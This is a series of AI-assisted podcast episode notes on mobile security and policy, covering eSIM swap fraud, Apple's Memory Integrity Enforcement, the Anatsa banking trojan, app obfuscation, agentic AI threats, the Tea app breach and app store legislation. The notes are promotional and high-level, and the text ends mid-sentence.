👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Episode NotesDescription:In this episode of Upwardly Mobile, we dive into one of the most pressing cybersecurity threats facing mobile carriers and their subscribers: eSIM swap fraud. While digital SIMs offer superior security against physical theft, they remain vulnerable to sophisticated credential-based attacks and social engineering that target the carrier's systems. We explain how this critical fraud operates and reveal the advanced, cloud-based technologies—App Attestation and Device Binding—that mobile operators are now deploying to verify user identity and device integrity in real time, effectively blocking fraudsters before a swap can be completed.The eSIM Swap ThreateSIM swapping is a form of identity fraud where an attacker convinces a mobile carrier to transfer a victim's phone number to a new eSIM under the attacker's control, often by impersonating the legitimate user remotely.• Attack Method: Attackers often gather personal details from public sources or breaches, then contact the carrier, claiming they need to transfer their number to a new device. Since no physical access is needed, the fraud relies entirely on weaknesses in the carrier’s authentication process.• The Impact: Once a swap is successful, the criminal gains full control over the victim's phone number. They can intercept calls, texts, and, critically, one-time security codes (OTPs) sent via SMS, allowing them to bypass two-factor authentication (2FA) for online banking, cryptocurrency exchanges, and other sensitive accounts, leading to massive financial loss.The Technical Solution: Attestation and BindingTo counter these remote, identity-based attacks, carriers are adopting a multi-layered verification approach focused on establishing the trustworthiness of the application and the hardware initiating the swap request.1. App AttestationThis technology focuses on verifying the integrity and legitimacy of the carrier's mobile application.• Verification: App Attestation confirms that the carrier's app being used is the genuine, untampered version downloaded directly from an official app store.• Prevention: It detects if the app has been modified with malicious code or is running in a compromised environment, such as an emulator. If an attacker attempts to use a fake or compromised version of the carrier’s app to initiate a fraudulent eSIM swap request, app attestation detects and blocks that request.2. Device BindingDevice Binding provides a cryptographic link between a user's account and the unique hardware characteristics of their trusted device.• Secure Link: When a user first logs in, a secure link is created between the app and the device's hardware IDs.• Suspicion Flagging: If a request for an eSIM swap is later initiated from a different, unverified device, the system flags the activity as suspicious, regardless of whether the attacker has stolen credentials. The system can then require additional verification steps or outright deny the unauthorized transfer.This combined approach shifts the security decision-making from the potentially compromised user device to a secure cloud service, making it extremely difficult for attackers to bypass checks through client-side tampering or reverse-engineering.Comprehensive Security Layers for Mobile CarriersBeyond app and device verification, mobile carriers are advised to strengthen defenses through systemic controls:• Stricter Authentication: Implementing secure authentication processes for eSIM transfers, including demanding extra layers like verbal confirmation or a photo ID.• Device Fingerprinting: Binding eSIM profiles to unique device hardware IDs to prevent unauthorized cloning or reuse across multiple devices.• Advanced Analytics: Leveraging AI-Driven Fraud Detection and machine learning to monitor network activity for anomalies, such as unusual call volumes or multiple simultaneous activations, which might signal digital SIM Box fraud schemes.• User Protection Features: Offering tools like Verizon's "SIM Protection," which allows customers to lock lines on their account, prohibiting any transaction requiring a new SIM/eSIM transfer until manually unlocked (with a possible 15-minute delay when unlocking).Protect Yourself: User Best PracticesUsers must also adopt strong security habits to minimize risk:• Prioritize App-Based 2FA: Always use authenticators like Google Authenticator or Authy over SMS-based two-factor authentication (2FA) for critical accounts, as SMS codes can be intercepted post-swap.• Secure Your Carrier Account: Set a strong password and add an account PIN or passcode with your carrier to prevent unauthorized changes.• Stay Vigilant: Immediately contact your carrier if you notice unexpected loss of cellular service, unusual account alerts, or unauthorized charges, which are common signs of a successful eSIM hack.--------------------------------------------------------------------------------SponsorThis episode is brought to you by Approov, pioneers in Mobile App and Device Security. Learn how Approov’s App Attestation and Device Binding solutions safeguard your mobile transactions and prevent sophisticated fraud.Visit: approov.io🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this episode, we're diving deep into Apple's groundbreaking Memory Integrity Enforcement (MIE), an unprecedented effort poised to redefine the landscape of mobile security, and we'll also explore the broader spectrum of threats targeting the iOS ecosystem.Apple's Memory Integrity Enforcement (MIE) is the culmination of a half-decade of intensive design and engineering, combining the unique strengths of Apple silicon hardware with advanced operating system security. Apple believes MIE represents the most significant upgrade to memory safety in the history of consumer operating systems. This comprehensive, always-on protection is designed to provide industry-first memory safety across Apple devices, all without compromising device performance.The Driving Force: Combating Mercenary Spyware While the iPhone has never experienced a successful, widespread malware attack, Apple's focus for MIE is primarily on the mercenary spyware and surveillance industry. These highly sophisticated threats, often associated with state actors, utilize exploit chains that can cost millions of dollars to target a small number of specific individuals. A common denominator in these advanced attacks, whether targeting iOS, Windows, or Android, is their reliance on memory safety vulnerabilities. MIE aims to disrupt these highly effective exploitation techniques that have been prevalent for the last 25 years.How MIE Works: A Three-Pronged Defense MIE is built on a robust foundation of hardware and software innovations:1. Secure Memory Allocators: Apple's efforts in memory safety include developing with safe languages like Swift and deploying mitigations at scale. Key to MIE are its secure memory allocators, such as kalloc_type (introduced in iOS 15 for the kernel) and xzone malloc (for user-level in iOS 17), alongside WebKit's libpas. These allocators use type information to organize memory, thwarting attackers' goals of creating overlapping interpretations of memory to exploit use-after-free and out-of-bounds bugs.2. Enhanced Memory Tagging Extension (EMTE): Building on Arm's 2019 Memory Tagging Extension (MTE) specification, Apple conducted deep evaluations and collaborated with Arm to address weaknesses, leading to the Enhanced Memory Tagging Extension (EMTE) specification in 2022. MIE rigorously implements EMTE in strictly synchronous, always-on mode, a crucial factor for real-time defensive measures in adversarial contexts. EMTE prevents common memory corruption types:    ◦ Buffer Overflows: The allocator tags neighboring allocations with different secrets. If memory access spills over into an adjacent allocation with a different tag, the hardware blocks it, and the operating system can terminate the process.    ◦ Use-After-Free Vulnerabilities: Memory is retagged when reused. If a request uses an older, invalid tag for retagged memory, the hardware blocks it. EMTE also specifies that accessing non-tagged memory from a tagged region requires knowing that region’s tag, making it harder for attackers to bypass EMTE.3. Tag Confidentiality Enforcement: This critical component protects the implementation of Apple's secure allocators and the confidentiality of EMTE tags, even against side-channel and speculative-execution attacks. Apple's silicon implementation prevents tag values from influencing speculative execution, a vulnerability seen in other MTE implementations. Furthermore, MIE addresses Spectre variant 1 (V1), a speculative-execution vulnerability, with a mitigation designed for virtually zero CPU cost, making it impractical for attackers to leak tag values and guide attacks.Impact and Availability Memory Integrity Enforcement is built right into Apple hardware and software in all iPhone 17 and iPhone Air models, offering unparalleled, always-on memory safety protection for key attack surfaces, including the kernel and over 70 userland processes. Importantly, MIE was designed to deliver groundbreaking security with minimal performance impact, remaining completely invisible to users. Apple is also making EMTE available to all developers in Xcode as part of the new Enhanced Security feature. Extensive evaluations by Apple's offensive research team have confirmed that MIE dramatically reduces the exploitation strategies available to attackers, making it extremely difficult to rebuild exploit chains.Beyond MIE: Other Threats to iOS Devices While MIE targets memory corruption, the iOS ecosystem faces a range of other threats:• Application-Level Threats: These include various forms of malware, such as TouchID malware, Yispecter, and AceDeceiver, which exploit design flaws or trick users. More widespread are leaky applications (greyware), representing 61% of iOS apps, which legally collect and silently forward unnecessary personal data like location, contacts, and photos to third parties.• Network-Level Threats: iOS devices are as exposed to network-related threats as any other operating system. These include Man-In-The-Middle (MITM) attacks, where communications are intercepted or altered via unprotected WiFi hotspots or spoofing. Phishing and Smishing are the most detected network threats on mobile devices, trapping users through malicious links in emails or SMS. Rogue cell towers can also trick devices into connecting, allowing interception of calls, SMS, and data.• Device-Level Threats: OS vulnerability exploits occur when cybercriminals leverage public security holes in outdated iOS versions (e.g., Pegasus spyware). Jailbroken devices bypass iOS security checks, making them more vulnerable to malicious applications. Finally, unmanaged or malicious profiles can be configured to send all transiting data to external servers, crushing data privacy.Organizations like Pradeo offer solutions such as Mobile Threat Defense (MTD) and Mobile Application Security Testing to provide full protection for mobile fleets and applications, safeguarding data and ensuring compliance with data privacy regulations.--------------------------------------------------------------------------------Relevant Links to Source Materials:• For deeper insights into Apple's Memory Integrity Enforcement, refer to the "Memory Integrity Enforcement: A complete vision for memory safety in Apple devices" research by Apple Security Engineering and Architecture (SEAR).• To understand broader iOS threats, consult the "iOS SECURITY REPORT: THREATS TARGETING APPLE MOBILE DEVICES" white paper by Pradeo.Sponsored by: Enhance your mobile API security with Approov. Visit them at approov.io.--------------------------------------------------------------------------------Keywords: Apple security, Memory Integrity Enforcement (MIE), iOS security, memory safety, mercenary spyware, EMTE, secure allocators, buffer overflows, use-after-free, speculative execution, cyber threats, mobile security, iPhone security, hardware security, software security, enterprise mobility, mobile malware, leaky applications, Man-In-The-Middle, phishing, jailbreaking, OS vulnerabilities, Pradeo Security, API security, mobile API protection, device integrity.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The App Store Freedom ActEpisode Description: In this episode of Upwardly Mobile, we unpack the App Store Freedom Act, a landmark bipartisan bill aiming to reform the highly concentrated mobile app marketplace dominated by tech giants like Apple and Google. Introduced by Representative Kat Cammack (R-FL) and co-sponsored by Representative Lori Trahan (D-MA), this legislation addresses significant concerns about anti-competitive practices, consumer choice, and developer freedom.The Coalition for App Fairness (CAF), an independent nonprofit advocating for consumer choice and a level playing field for app developers, applauds the bill's bipartisan support, seeing it as a crucial step to dismantle "mobile walled gardens". We explore the bill's key provisions, which include allowing users to choose third-party app stores, install apps outside of official stores, and delete pre-installed applications. The Act also seeks to remove limitations on communication between developers and users, cap commissions on payments outside default systems, and mandate data sharing for app developers.However, the App Store Freedom Act isn't without its critics. We delve into the concerns raised by the American Action Forum, particularly regarding potential overlaps with existing antitrust law and recent rulings like Apple v. Epic Games. A major point of contention is the security implications: opening up app stores could lead to a significant influx of fraudulent apps, data theft, and unverified third-party providers, potentially compromising the "walled garden" security benefits that currently protect users. We also discuss how while the bill might expedite FTC enforcement, it could bypass crucial antitrust requirements, potentially overlooking pro-consumer behaviors by app store providers. Join us as we explore the multifaceted debate surrounding this pivotal piece of tech legislation.Key Discussion Points:• The Problem: Anti-competitive practices and lack of consumer freedom in mobile app stores controlled by Apple and Google.• The Bill's Purpose: To foster competition, enhance consumer choice, and create a level playing field for app developers globally.• Core Provisions of the App Store Freedom Act (H.R.3209):    ◦ Interoperability: Users can choose default third-party app stores, install apps from outside sources, and hide/delete pre-installed apps.    ◦ Open App Development: Requires covered companies to provide developers with access to interfaces, hardware, and software features on equivalent terms.    ◦ Prohibitions: Bans requirements for specific in-app payment systems, prevents punitive actions against developers using alternative pricing or payment methods, and protects legitimate business communications between developers and users.    ◦ Nonpublic Business Information: Prohibits covered companies from using developer data to compete against those apps.• Enforcement: Violations are treated as unfair or deceptive acts by the Federal Trade Commission (FTC), with potential civil penalties up to $1,000,000 per violation. State attorneys general can also bring civil actions.• Overlap with Existing Law & Apple v. Epic Games: Discussion on whether new legislation is fully necessary given previous court rulings that addressed similar anti-steering practices.• Security Concerns: Analysis of how opening the "walled garden" could impact user safety, potentially leading to fraudulent apps, stolen data, and unverified third-party providers.• Balancing Act: The trade-offs between promoting competition and maintaining user security and convenience.Relevant Source Materials for this Summary:• "CAF Applauds Bipartisan Support for App Store Freedom Act - Coalition for App Fairness"• "Evaluating the App Store Freedom Act - AAF"• "Text - H.R.3209 - 119th Congress (2025-2026): App Store Freedom Act | Congress.gov | Library of Congress"Sponsor: This episode of Upwardly Mobile is brought to you by Approov.io. Secure your APIs and mobile apps against fraud and abuse. Visit approov.io to learn more.Keywords: App Store Freedom Act, digital markets, app store regulation, Apple, Google, anti-competitive practices, consumer choice, app developers, mobile apps, Open App Markets Act, Apple v. Epic Games, FTC, security concerns, H.R.3209, mobile walled gardens, competition policy, tech legislation, digital monopoly, software development, consumer protection, privacy.  --------------------------------------------------------------------------------🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Episode Title: Anatsa Unleashed: How a Sophisticated Android Banking Trojan Targets Over 830 Financial Apps GloballyIn this episode of "Upwardly Mobile," we dive deep into the alarming evolution of Anatsa, a potent Android banking trojan that has significantly expanded its reach, now setting its sights on over 830 financial applications worldwide. First identified in 2020, Anatsa (also known as Teabot or Troddler) grants its operators full control over infected devices, enabling them to perform fraudulent transactions and steal critical bank information, cryptocurrencies, and various other data on behalf of victims.What You'll Learn in This Episode:• Anatsa's Expanded Targets: Discover how the Anatsa banking trojan has broadened its scope to include more than 150 new banking and cryptocurrency applications, extending its malicious campaigns to mobile users in new countries like Germany and South Korea.• Deceptive Distribution Methods: Understand the cunning ways Anatsa spreads, primarily through decoy applications found on the official Google Play Store. These seemingly harmless apps often masquerade as useful tools like PDF viewers, QR code scanners, or phone cleaners, accumulating over 50,000 downloads in some cases. Once installed, they silently fetch a malicious payload disguised as an update from Anatsa's command-and-control (C&C) server.• Advanced Evasion Techniques: Learn about Anatsa's sophisticated anti-analysis and anti-detection mechanisms, designed to evade security measures. These include decrypting strings at runtime using dynamically generated Data Encryption Standard (DES) keys, performing emulation and device model checks, and periodically altering package names and installation hashes. The malware even hides its DEX payload within corrupted archives that bypass standard static analysis tools.• How Anatsa Compromises Devices: Find out how Anatsa requests and automatically enables critical accessibility permissions upon installation. This allows it to display overlays on top of legitimate applications, tamper with notifications, receive and read SMS messages, and ultimately present fake banking login pages to steal credentials. The trojan also incorporates keylogging capabilities.• Industry Response: Hear about the efforts of cybersecurity firms like Zscaler, which identified and reported 77 nefarious applications distributing Anatsa and other malware families, collectively accounting for over 19 million downloads. While Google has since removed these reported applications and states that Google Play Protect offers automatic protection, the continuous evolution of Anatsa highlights the ongoing threat.Protect Yourself: Cybersecurity experts advise Android users to always verify the permissions that applications request and ensure they align with the intended functionality of the app.--------------------------------------------------------------------------------Relevant Links to Source Materials:• Source 1: SecurityWeek Article on Anatsa: "Anatsa Android Banking Trojan Now Targeting 830 Financial Apps"• Source 2: Zscaler ThreatLabz Report: "Anatsa’s Latest Updates | ThreatLabz"• Source 3: BSI Report on Anatsa: "BSI - Anatsa / Teabot"--------------------------------------------------------------------------------Sponsor: This episode of "Upwardly Mobile" is brought to you by Approov Mobile Security. Learn more about securing your mobile applications at approov.io.--------------------------------------------------------------------------------Keywords: Anatsa, Android banking trojan, mobile security, cybersecurity, financial apps, Google Play, malware, credential theft, keylogging, fraudulent transactions, Zscaler, threat intelligence, Android malware, cryptocurrency, mobile banking, data protection, Teabot, Troddler, anti-analysis, C&C server.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Apple's iOS Obfuscation Dilemma: App Store Rejection & Developer Security ChallengesIn this vital episode of "Upwardly Mobile," we dive deep into the complexities of mobile app security within the healthcare sector, particularly concerning the HIPAA Security Rule and the challenges of iOS code obfuscation and App Store review. As telemedicine and mobile access to ePHI (Electronic Protected Health Information) become ubiquitous, understanding and implementing robust security measures is no longer optional—it's imperative. What You'll Learn in This Episode:The Evolving Threat Landscape for Healthcare Apps: Discover how the rapid adoption of mobile healthcare apps by both patients and practitioners has created new, data-rich attack surfaces for hackers. This includes apps used for consultations, prescription refills, appointment scheduling, accessing test results, and even those associated with medical devices.Limitations of Traditional Security: We explore why traditional security approaches and even robust TLS (Transport Layer Security) are often insufficient for protecting mobile healthcare apps and their APIs, particularly due to the unique exposure of mobile app code and device environments. Xcode's native build settings like symbol stripping and dead code stripping are primarily for optimization and offer no meaningful protection against determined reverse-engineering efforts.Proposed Improvements to the HIPAA Security Rule: Learn about Approov's specific recommendations to strengthen the updated HIPAA Security Rule (initially proposed in June 2024), focusing on mobile apps accessing ePHI. Key proposed changes include mandating:App Attestation: A proven technique to ensure only genuine, unmodified apps can access APIs.Runtime Device Attestation: Continuous scanning and real-time reporting of device environments to block requests from compromised devices.Dynamic Certificate Pinning: Essential for protecting communication channels from Man-in-the-Middle (MitM) attacks, even when traffic is encrypted.API Secret Protection: Explicit guidelines to ensure API keys are never stored in mobile app code and are delivered only as needed to verified apps.Runtime Zero Trust Protection of Identity Exploits: Additional controls like app and device attestation to provide an extra layer of zero-trust security against credential stuffing and identity abuse.Breach Readiness and Service Continuity: Extending incident response plans to cover third-party breaches and explicitly managing API keys and certificates during a breach.The Role of OWASP MASVS: Understand how the OWASP Mobile Application Security Verification Standard (MASVS) serves as the industry standard for mobile app security, offering guidelines for developers and testers. We specifically highlight MASVS-RESILIENCE for hardening apps against reverse engineering and tampering.The iOS Obfuscation Dilemma: Unpack the conflict faced by developers in regulated industries like fintech and healthcare: the critical need to protect proprietary algorithms and sensitive logic through code obfuscation versus the risk of rejection by Apple's App Store. Apple's guidelines are ambiguously enforced, often flagging aggressive obfuscation as an attempt to "trick the review process".Third-Party Obfuscation Solutions: Since Xcode provides no built-in true obfuscation features, we discuss the imperative for advanced third-party solutions. Learn about techniques like symbol renaming, string encryption, control flow obfuscation, and dummy code insertion. We also touch upon leading commercial tools like Guardsquare's iXGuard, Zimperium's Mobile Application Protection Suite (MAPS), and Appdome, as well as LLVM-based obfuscators.Obfuscation as a Compliance Control: Discover why code obfuscation and Runtime Application Self-Protection (RASP) are fundamental technical safeguards for HIPAA compliance and meeting the requirements of PCI DSS, even if not explicitly named in the regulations.Strategic Recommendations for Implementation: Get insights on implementing a risk-based tiered approach to app protection, integrating obfuscation into your CI/CD pipeline, and transparently communicating your security posture to the App Store review team to mitigate rejection risks.Tune in to gain a comprehensive understanding of securing your mobile health applications in today's complex digital environment! Relevant Links & Resources:Sponsor: Learn more about app and API security solutions from Approov: approov.ioApproov Blog: Injecting Mobile App Security into The HIPAA Healthcare Security Rule: approov.io/blog/injecting-mobile-app-security-into-the-hipaa-healthcare-security-ruleOWASP Mobile Application Security (MAS) Project: owasp.org/www-project-mobile-app-securityOWASP Mobile Application Security Verification Standard (MASVS): mas.owasp.org/MASVS/03-Using_the_MASVS/Keywords: Mobile App Security, Healthcare, HIPAA, ePHI, API Security, Code Obfuscation, iOS Security, App Store Review, App Attestation, Runtime Application Self-Protection (RASP), PCI DSS, OWASP MASVS, Man-in-the-Middle (MitM) Attacks, API Keys, Zero Trust, Telemedicine, Virtual Healthcare, Mobile Health, Cybersecurity, Enterprise Security, Data Protection, Compliance, InfoSec, Privacy, Digital Health. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Securing the Autonomous Frontier: Defending Apps and APIs from Agentic AI ThreatsEpisode Notes In this episode of Upwardly Mobile, we delve into the critical and rapidly evolving landscape of Agentic AI security. As artificial intelligence advances beyond reactive responses to become autonomous systems capable of planning, reasoning, and taking action without constant human intervention, the need for robust security measures has become paramount. These intelligent software systems perceive their environment, reason, make decisions, and act to achieve specific objectives autonomously, often leveraging large language models (LLMs) for their core reasoning engines and control flow. The Rise of Agentic AI and Magnified Risks Agentic AI is rapidly integrating into various applications across diverse industries, from healthcare and finance to manufacturing. However, this increased autonomy magnifies existing AI risks and introduces entirely new vulnerabilities. As highlighted by the OWASP Agentic Security Initiative, AI isn’t just accelerating product development; it's also automating attacks and exploiting gaps faster than ever before. LLMs, for instance, can already brute force APIs, simulate human behavior, and bypass rate limits without triggering flags. Key security challenges with Agentic AI include:- Poorly designed reward systems, which can lead AI to exploit loopholes and achieve goals in unintended ways.- Self-reinforcing behaviors, where AI escalates actions by optimizing too aggressively for specific metrics without adequate safeguards.- Cascading failures in multi-agent systems, arising from bottlenecks or resource conflicts that propagate across interconnected agents.- Increased vulnerability to sophisticated adversarial attacks, including AI-powered credential stuffing bots and app tampering attempts.- The necessity for sensitive data access, making robust access management and data protection crucial.The OWASP Agentic Security Initiative has identified a comprehensive set of threats unique to these systems, including:- Memory Poisoning and Cascading Hallucination Attacks, where malicious or false data corrupts the agent's memory or propagates inaccurate information across systems.- Tool Misuse, allowing attackers to manipulate AI agents to abuse their integrated tools, potentially leading to unauthorized data access or system manipulation.- Privilege Compromise, exploiting weaknesses in permission management for unauthorized actions or dynamic role inheritance.- Intent Breaking & Goal Manipulation, where attackers alter an AI's planning and objectives.- Unexpected Remote Code Execution (RCE) and Code Attacks, leveraging AI-generated code environments to inject malicious code.- Identity Spoofing & Impersonation, enabling attackers to masquerade as AI agents or human users.- Threats specific to multi-agent systems like Agent Communication Poisoning and the presence of Rogue Agents, where malicious agents infiltrate and manipulate distributed AI environments.Essential Mitigation Strategies for Agentic AI Defending against these advanced threats requires a multi-layered, adaptive security approach. Our sources outline several crucial best practices for both app and API security: 1. Foundational App Security Best Practices:- Continuous Authentication: Move beyond session-based authentication. Implement behavioral baselines, short-lived tokens, session fingerprinting, and re-authentication on state changes to ensure the right user is in control.- Detecting AI-Generated Traffic: Employ behavioral anomaly detection, device and environment fingerprinting, adaptive challenge-response mechanisms, and input entropy measurement to identify and block sophisticated AI bots.- Secure APIs as Crown Jewels: Implement strict input validation, rate limiting per user/IP/API key, authentication/authorization at every endpoint, request signing, replay protection, and detailed logging.- Zero Trust Architecture: Assume no part of your infrastructure is inherently trusted. Enforce identity and access management at every layer, segment networks, use mutual TLS between services, and continuously monitor for unusual access patterns.- Harden MFA Workflows: Mitigate MFA fatigue attacks by moving away from push notifications as the primary MFA method, preferring hardware tokens or TOTP, and limiting approval attempts with exponential backoff.- LLM-Aware Security Filters: If your app uses LLMs, implement context-aware input sanitization, prompt filtering layers, output monitoring for hallucinations, and rate limit suspicious query patterns.- Encrypt and Obfuscate Client-Side Code: Protect intellectual property and reduce attack surface by obfuscating code, encrypting sensitive strings, implementing runtime code splitting, and avoiding embedding secrets in client code.- Train Detection Systems with Synthetic Attacks: Use AI-generated synthetic attack simulations to train ML classifiers for anomaly detection, turning AI's offensive power into a defensive advantage.- Adopt Secure-by-Design Principles: Integrate security into every phase of the development lifecycle, validating inputs, enforcing least privilege, using static/dynamic code analysis, and automating dependency management.- Stay Compliant with Emerging AI Security Standards: Implement transparent logging and audit trails for AI interactions, ensure explainability, follow data minimization principles, and prepare for AI risk management certifications.2. API-Specific Defenses for Agentic AI:- Design for API Security by Default: Apply secure-by-design principles, enforce HTTPS/TLS 1.3, use least-privilege permissions, and implement strong authentication/authorization with dynamically-scoped tokens.- Identify & Monitor AI-Agent Traffic: Include agentic endpoints in API discovery and monitor traffic in real-time using AI-backed analytics to detect anomalous behavior.- Context-Aware Guardrails & Threat Modeling: Develop tailored agentic AI threat models like MAESTRO or SHIELD/ATFAA and implement LLM-aware guardrails to enforce boundaries.- Authenticate & Audit AI Agent Identities: Treat each agent as a non-human identity, enforce strong credential hygiene, rotate secrets, and audit identity posture.- Input/Output Filtering & Prompt Hygiene: Defend against prompt injection through sanitization, prompt separation, and adversarial testing. Enforce data hygiene for agent memory to mitigate poisoning attacks.- Continuous Authentication & Rate Limiting: Avoid long-lived sessions with continuous authentication and use strict rate limiting to prevent bots from chaining tasks or overwhelming endpoints.- Use Adaptive Security Tools & AI-Based Defense: Deploy API security platforms with real-time anomaly detection and consider a "good-guy" AI to inspect agent intents.- Red-Teaming & Continuous Testing: Simulate attacks like memory poisoning, prompt injection, and privilege misuse to uncover vulnerabilities proactively.- Training & Governance: Educate teams on agent-specific vulnerabilities and establish agent lifecycle governance with approval flows, isolation environments, and human-in-the-loop checkpoints.3. OWASP's Mitigation Playbooks: The OWASP Agentic Security Initiative provides structured mitigation strategies organized into playbooks, addressing specific threat categories:- Preventing AI Agent Reasoning Manipulation: Focuses on reducing attack surface, implementing agent behavior profiling, preventing goal manipulation, and strengthening decision traceability.- Preventing Memory Poisoning & AI Knowledge Corruption: Involves securing AI memory access, detecting/responding to poisoning, and preventing the spread of false knowledge.- Securing AI Tool Execution & Preventing Unauthorized Actions: Emphasizes restricting AI tool invocation, monitoring/preventing tool misuse, and preventing resource exhaustion.- Strengthening Authentication, Identity & Privilege Controls: Covers secure AI authentication mechanisms, restricting privilege escalation, and detecting/blocking AI impersonation attempts.- Protecting Human-in-the-Loop (HITL) & Preventing Decision Fatigue Exploits: Aims to optimize HITL workflows, identify AI-induced human manipulation, and strengthen AI decision traceability.- Securing Multi-Agent Communication & Trust Mechanisms: Focuses on securing AI-to-AI communication, detecting/blocking rogue agents, and enforcing multi-agent trust and decision security.Companies like https://approov.io/blog/what-you-need-to-know-about-broken-object-level-authorization-bola offer patented mobile app attestation technology that ensures only genuine, unmodified apps running in trusted environments can access backend services and APIs, providing real-time verification, dynamic API shielding, and secure credential management to mitigate AI-driven credential leaks. By combining traditional API security fundamentals with agent-specific strategies, mobile developers can transform APIs from vulnerabilities into resilient trust boundaries, capable of resisting threats posed by autonomous, goal-oriented AI agents.Relevant Links:- Rocket Farm Studios: 10 App Security Best Practices for AI Threats - Learn more about securing apps against AI-driven threats: https://www.rocketfarmstudios.com/blog/10-app-security-best-practices-for-ai-threats/- https://genai.owasp.org/resource/agentic-ai-threats-and-mitigations/🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The Future of App Development with Vibe Coding and ApproovDescription: In this episode of Upwardly Mobile, we delve into the exciting, fast-paced world of "vibe coding" and rapid app development, where concepts can transform into functional Minimum Viable Products (MVPs) in days, not weeks. We discuss how intuitive, AI-powered platforms like Lovable are enabling developers to build full-stack web applications using plain English, focusing on the "vibe" of the application rather than getting bogged down in traditional coding complexities.However, this speed comes with significant security risks. We explore the critical case of the Tea dating app data breach, a women-only dating advice app that suffered an extensive hack exposing users' direct messages and photos, including an additional 59,000 images and DMs. Experts like Ted Miracco, CEO at mobile security maker Approov, emphasized that Tea lacked adequate security protections and "rushed to market," exposing consumers. The breach highlighted a systemic problem: the real attack surface for mobile apps often lies in their backend APIs, which are not inherently secured by app store vetting processes like Apple's or Google's. Attackers were able to reverse-engineer the mobile client and access sensitive data through an insecure, unauthenticated API.So, how can you build fast without sacrificing security? We introduce Approov, a security solution designed to ensure that only genuine instances of your app, running on safe devices, can access your APIs. Approov protects against various threats, including malicious bots, tampered apps, credential stuffing, and API abuse. Key defenses Approov offers include App Attestation, Ephemeral API Keys, Dynamic Certificate Pinning, RASP (Runtime Application Self-Protection), and Real-time Monitoring.For early-stage startups, Approov has launched a "Founder-Friendly Tier," providing core security features at a price point and scale that makes sense for new ventures, helping to bridge the gap between rapid development and robust security. Making security a priority from day one offers a powerful advantage: it boosts investor confidence, builds user trust, and prevents costly, time-consuming security retrofits down the line. As the sources suggest, "secure APIs are the new uptime," and security should be seen as a differentiator, not a tax.Key Takeaways:• Vibe coding and platforms like Lovable enable incredibly fast app development, allowing quick market entry and iteration.• Rapid development can introduce significant security vulnerabilities, especially at the API level, as demonstrated by the Tea app data breach.• Approov provides essential mobile and API security solutions, including a new Founder-Friendly Tier, to protect apps from launch through scaling.• Prioritizing security from the start enhances investor confidence and user trust, proving to be an "unfair advantage" in the competitive app market.Relevant Links:• CBS News: Tea dating app disables direct messaging as it investigates data breach: https://www.cbsnews.com/news/tea-dating-app-data-breach-cbs-news/• VIBE Apps | Fast to Market, Risky to Deploy? The Security Debt in Rapid App Development: https://www.linkedin.com/pulse/vibe-apps-fast-market-risky-deploy-security-debt-rapid-approov-mobile-security• From Vibe to Venture: A Guide to Building and Securing Your App: https://approov.io/blog/from-vibe-to-venture Sponsor: This episode is brought to you by Approov Mobile Security. Learn more about securing your mobile app and APIs, including the new Founder-Friendly Tier, at approov.io.Keywords: vibe coding, app development, mobile security, API security, data breach, Tea app, Lovable, Approov, startup security, founder-friendly tier, fast to market, app launch, investor confidence, user trust, cybersecurity, no-code, low-code, app protection, digital security🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Apple's Enduring Browser Engine Ban: A Global Standoff for the Open WebDescription:In this episode of Upwardly Mobile, we delve into Apple's persistent ban on third-party browser engines on iOS, a restriction that continues to stifle competition and limit the capabilities of web applications. Despite growing global pressure and explicit legal mandates like the EU's Digital Markets Act (DMA), Apple has maintained technical and contractual barriers that make it commercially unviable for other browser vendors like Google and Mozilla to offer their own engines on iOS. We explore why this ban matters for consumers, developers, and the future of the open internet.Key Discussion Points:• The Unique Ban: Apple is the only "gatekeeper" that imposes a ban on third-party browser engines, forcing all browsers on iOS to use its proprietary WebKit engine. This prevents genuine browser competition and limits the functionality and performance of web apps, hindering their ability to compete with native apps• Apple's Justifications vs. Reality:    ◦ Apple claims its restrictions are for security, privacy, and system integrity. Apple's representatives, like Kyle Andeer and Gary Davis, assert that browser vendors have "everything they need" and have simply "chosen not to" port their engines.    ◦ However, critics argue that Apple uses security and privacy as an "elastic shield" for its financial interests. Evidence does not suggest material differences in security performance between WebKit and alternative engines. Browser vendors, with their strong security track records, could even improve iOS security by competing• Barriers to Entry: The primary obstacles preventing alternative browser engines on iOS include:    ◦ Loss of existing EU users: Browser vendors are forced to create entirely new apps, meaning they must abandon current users and start from scratch in the EU. This single requirement "destroys the business case".    ◦ No web developer testing outside EU: Developers globally cannot test their web software on third-party engines on iOS for EU users.    ◦ Hostile legal terms: Apple's contractual conditions are "harsh, one-sided, and incompatible with the DMA".    ◦ Uncertainty on updates for travelers: Apple has not confirmed that browser updates (including security patches) will not be disabled if an EU user travels outside the EU for more than 30 days.• Regulatory Pressure and Compliance:    ◦ EU Digital Markets Act (DMA): Explicitly prohibits gatekeepers from requiring the use of their web browser engine.The DMA demands "effective compliance" and prohibits undermining obligations through technical or contractual means. Despite 15 months, no browser vendor has successfully ported an engine, indicating Apple's non-compliance.    ◦ Japan's Smartphone Act (MSCA): Passed and will directly prohibit Apple's ban by December 2025. Guidelines clarify that actions that hinder adoption, not just outright bans, are prohibited. It also mandates fair API access and prompt choice screens at initial smartphone setup.    ◦ UK 